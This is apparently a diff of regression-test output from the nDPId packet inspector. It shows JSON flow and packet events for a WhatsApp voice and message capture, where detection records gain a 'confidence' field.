 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1432820558921,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1432820558921,"pkt":"ABoRAAACABoRAAABCABFAAA89o5AAEAGzkgKCAABuK2zLoqYAbsGFK3rAAAAAKACOQj9WQAAAgQFtAQCCAoABFtlAAAAAAEDAwQ="}
 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1432820558982,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1432820558982,"pkt":"ABoRAAACABoRAAABCABFAAAoAAJAABAG9Om4rbMuCggAAQG7ipj561IUBhSt7FAS\/\/+tmQAA"}
 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1432820558982,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1432820558982,"pkt":"ABoRAAACABoRAAABCABFAAAo9o9AAEAGzlsKCAABuK2zLoqYAbsGFK3s+etSFVAQOQh0kgAA"}
+00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820558921,"flow_last_seen":1432820559129,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":177,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1432820559129,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"184.173.179.46","src_port":35480,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}}
 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":26,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432820567259,"flow_last_seen":1432820567259,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1432820567259,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"31.13.84.48","src_port":53620,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00617{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1432820567259,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"ts_msec":1432820567259,"pkt":"ABoRAAACABoRAAABCABFwACaAABAAEARvE0KCAABHw1UMNF0DZYAhk4lAAMAaiESpEIAANFg4Ox4XqyZamxAAABmAQCy86Qxc0\/TrfZVVa\/eTEZDohPoeRLoRZc1aFVhrGc1f8RW2vMjT5P8rAsiwZ+p9NloXItIT0xPBspixBWhh83rOo673FqXfKhsmqCbgcYysEXxS1G0BQlmTNaw3EzKh7wFRa3N"}
-00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":26,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432820567259,"flow_last_seen":1432820567259,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1432820567259,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"31.13.84.48","src_port":53620,"dst_port":3478,"l4_proto":"udp","ndpi": {"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
+00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":26,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432820567259,"flow_last_seen":1432820567259,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1432820567259,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"31.13.84.48","src_port":53620,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
 00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1432820567597,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1432820567597,"pkt":"ABoRAAACABoRAAABCABFAABIAA5AABAR7VEfDVQwCggAAQ2W0XQANI6xAQMAGCESpEIAANFg4Ox4XqyZamwAIAAIAAHzk56wzx5AAgAIAAABTZrCzrs="}
 00617{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1432820567597,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"ts_msec":1432820567597,"pkt":"ABoRAAACABoRAAABCABFwACaAABAAEARvE0KCAABHw1UMNF0DZYAhk4lAAMAaiESpEIAANFg4Ox4XqyZamxAAABmAQCy86Qxc0\/TrfZVVa\/eTEZDohPoeRLoRZc1aFVhrGc1f8RW2vMjT5P8rAsiwZ+p9NloXItIT0xPBspixBWhh83rOo673FqXfKhsmqCbgcYysEXxS1G0BQlmTNaw3EzKh7wFRa3N"}
 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":30,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432820567917,"flow_last_seen":1432820567917,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1432820567917,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"31.13.74.48","src_port":53620,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00617{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1432820567917,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"ts_msec":1432820567917,"pkt":"ABoRAAACABoRAAABCABFwACaAABAAEARxk0KCAABHw1KMNF0DZYAhknAAAMAaiESpEIAABwXmwtuMPN7N0hAAABmAQCy86Qxc0\/TrfZVVa\/eTEZDohPoeRLoRZc1aFVhrGc1f8RW2vMjT5P8rAsiwZ+p9NloXItIT0xPBspixBWhh83rOo673FqXfKhsmqCbgcYysEXxS1G0BQlmTNaw3EzKh7wFRa3N"}
-00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":30,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432820567917,"flow_last_seen":1432820567917,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1432820567917,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"31.13.74.48","src_port":53620,"dst_port":3478,"l4_proto":"udp","ndpi": {"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
+00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":30,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432820567917,"flow_last_seen":1432820567917,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1432820567917,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"31.13.74.48","src_port":53620,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
 00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1432820568117,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1432820568117,"pkt":"ABoRAAACABoRAAABCABFAABIABBAABAR908fDUowCggAAQ2W0XQANMmPAQMAGCESpEIAABwXmwtuMPN7N0gAIAAIAAGyFZ6wzx5AAgAIAAABTZrC0PY="}
 00617{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1432820568118,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"ts_msec":1432820568118,"pkt":"ABoRAAACABoRAAABCABFwACaAABAAEARxk0KCAABHw1KMNF0DZYAhknAAAMAaiESpEIAABwXmwtuMPN7N0hAAABmAQCy86Qxc0\/TrfZVVa\/eTEZDohPoeRLoRZc1aFVhrGc1f8RW2vMjT5P8rAsiwZ+p9NloXItIT0xPBspixBWhh83rOo673FqXfKhsmqCbgcYysEXxS1G0BQlmTNaw3EzKh7wFRa3N"}
 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":34,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432820568346,"flow_last_seen":1432820568346,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1432820568346,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"31.13.64.48","src_port":53620,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00617{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1432820568346,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"ts_msec":1432820568346,"pkt":"ABoRAAACABoRAAABCABFwACaAABAAEAR0E0KCAABHw1AMNF0DZYAhjyrAAMAaiESpEIAAKkWq28lYULzqlFAAABmAQCy86Qxc0\/TrfZVVa\/eTEZDohPoeRLoRZc1aFVhrGc1f8RW2vMjT5P8rAsiwZ+p9NloXItIT0xPBspixBWhh83rOo673FqXfKhsmqCbgcYysEXxS1G0BQlmTNaw3EzKh7wFRa3N"}
-00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":34,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432820568346,"flow_last_seen":1432820568346,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1432820568346,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"31.13.64.48","src_port":53620,"dst_port":3478,"l4_proto":"udp","ndpi": {"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
+00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":34,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432820568346,"flow_last_seen":1432820568346,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1432820568346,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"31.13.64.48","src_port":53620,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
 00505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":35,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1432820568646,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1432820568646,"pkt":"ABoRAAACABoRAAABCABFAABIABJAABARAU4fDUAwCggAAQ2W0XQANK\/IAQMAGCESpEIAAKkWq28lYULzqlEAIAAIAAG83p6wzx5AAgAIAAABTZrC0t8="}
 00617{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1432820568646,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"ts_msec":1432820568646,"pkt":"ABoRAAACABoRAAABCABFwACaAABAAEAR0E0KCAABHw1AMNF0DZYAhjyrAAMAaiESpEIAAKkWq28lYULzqlFAAABmAQCy86Qxc0\/TrfZVVa\/eTEZDohPoeRLoRZc1aFVhrGc1f8RW2vMjT5P8rAsiwZ+p9NloXItIT0xPBspixBWhh83rOo673FqXfKhsmqCbgcYysEXxS1G0BQlmTNaw3EzKh7wFRa3N"}
 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":38,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432820568947,"flow_last_seen":1432820568947,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1432820568947,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.252.121.1","src_port":53620,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00617{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1432820568947,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"ts_msec":1432820568947,"pkt":"ABoRAAACABoRAAABCABFwACaAABAAEARCI0KCAABrfx5AdF0DZYAhjqZAAMAaiESpEIAAJtQaIETIh2AbQlAAABmAQCy86Qxc0\/TrfZVVa\/eTEZDohPoeRLoRZc1aFVhrGc1f8RW2vMjT5P8rAsiwZ+p9NloXItIT0xPBspixBWhh83rOo673FqXfKhsmqCbgcYysEXxS1G0BQlmTNaw3EzKh7wFRa3N"}
-00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":38,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432820568947,"flow_last_seen":1432820568947,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1432820568947,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.252.121.1","src_port":53620,"dst_port":3478,"l4_proto":"udp","ndpi": {"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
+00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":38,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432820568947,"flow_last_seen":1432820568947,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1432820568947,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.252.121.1","src_port":53620,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
 00505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":39,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1432820569197,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1432820569197,"pkt":"ABoRAAACABoRAAABCABFAABIABRAABAROYut\/HkBCggAAQ2W0XQANOG6AQMAGCESpEIAAJtQaIETIh2AbQkAIAAIAAGGsp6wzx5AAgAIAAABTZrC1Qc="}
 00617{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":40,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1432820569197,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"ts_msec":1432820569197,"pkt":"ABoRAAACABoRAAABCABFwACaAABAAEARCI0KCAABrfx5AdF0DZYAhjqZAAMAaiESpEIAAJtQaIETIh2AbQlAAABmAQCy86Qxc0\/TrfZVVa\/eTEZDohPoeRLoRZc1aFVhrGc1f8RW2vMjT5P8rAsiwZ+p9NloXItIT0xPBspixBWhh83rOo673FqXfKhsmqCbgcYysEXxS1G0BQlmTNaw3EzKh7wFRa3N"}
 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":42,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432820569427,"flow_last_seen":1432820569427,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1432820569427,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"179.60.192.48","src_port":53620,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00617{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1432820569427,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"ts_msec":1432820569427,"pkt":"ABoRAAACABoRAAABCABFwACaAABAAEARvB0KCAABszzAMNF0DZYAhkLTAAMAaiESpEIAALo2Lkt1PTwMswhAAABmAQCy86Qxc0\/TrfZVVa\/eTEZDohPoeRLoRZc1aFVhrGc1f8RW2vMjT5P8rAsiwZ+p9NloXItIT0xPBspixBWhh83rOo673FqXfKhsmqCbgcYysEXxS1G0BQlmTNaw3EzKh7wFRa3N"}
-00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":42,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432820569427,"flow_last_seen":1432820569427,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1432820569427,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"179.60.192.48","src_port":53620,"dst_port":3478,"l4_proto":"udp","ndpi": {"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
+00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":42,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432820569427,"flow_last_seen":1432820569427,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1432820569427,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"179.60.192.48","src_port":53620,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
 00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1432820569716,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1432820569716,"pkt":"ABoRAAACABoRAAABCABFAABIABZAABAR7RmzPMAwCggAAQ2W0XQANM1bAQMAGCESpEIAALo2Lkt1PTwMswgAIAAIAAGhQp6wzx5AAgAIAAABTZrC1xA="}
 00617{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1432820569716,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"ts_msec":1432820569716,"pkt":"ABoRAAACABoRAAABCABFwACaAABAAEARvB0KCAABszzAMNF0DZYAhkLTAAMAaiESpEIAALo2Lkt1PTwMswhAAABmAQCy86Qxc0\/TrfZVVa\/eTEZDohPoeRLoRZc1aFVhrGc1f8RW2vMjT5P8rAsiwZ+p9NloXItIT0xPBspixBWhh83rOo673FqXfKhsmqCbgcYysEXxS1G0BQlmTNaw3EzKh7wFRa3N"}
 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":46,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432820570006,"flow_last_seen":1432820570006,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1432820570006,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"31.13.79.192","src_port":53620,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00617{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1432820570006,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"ts_msec":1432820570006,"pkt":"ABoRAAACABoRAAABCABFwACaAABAAEARwL0KCAABHw1PwNF0DZYAhsORAAMAaiESpEIAAFk9lyNgFikbVyNAAABmAQCy86Qxc0\/TrfZVVa\/eTEZDohPoeRLoRZc1aFVhrGc1f8RW2vMjT5P8rAsiwZ+p9NloXItIT0xPBspixBWhh83rOo673FqXfKhsmqCbgcYysEXxS1G0BQlmTNaw3EzKh7wFRa3N"}
-00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":46,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432820570006,"flow_last_seen":1432820570006,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1432820570006,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"31.13.79.192","src_port":53620,"dst_port":3478,"l4_proto":"udp","ndpi": {"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
+00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":46,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432820570006,"flow_last_seen":1432820570006,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1432820570006,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"31.13.79.192","src_port":53620,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
 00506{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1432820570428,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1432820570428,"pkt":"ABoRAAACABoRAAABCABFAABIABhAABAR8bcfDU\/ACggAAQ2W0XQANGvgAQMAGCESpEIAAFk9lyNgFikbVyMAIAAIAAGA\/J6wzx5AAgAIAAABTZrC2ZA="}
 00617{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1432820570428,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"ts_msec":1432820570428,"pkt":"ABoRAAACABoRAAABCABFwACaAABAAEARwL0KCAABHw1PwNF0DZYAhsORAAMAaiESpEIAAFk9lyNgFikbVyNAAABmAQCy86Qxc0\/TrfZVVa\/eTEZDohPoeRLoRZc1aFVhrGc1f8RW2vMjT5P8rAsiwZ+p9NloXItIT0xPBspixBWhh83rOo673FqXfKhsmqCbgcYysEXxS1G0BQlmTNaw3EzKh7wFRa3N"}
 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":50,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432820570876,"flow_last_seen":1432820570876,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1432820570876,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"31.13.93.48","src_port":53620,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
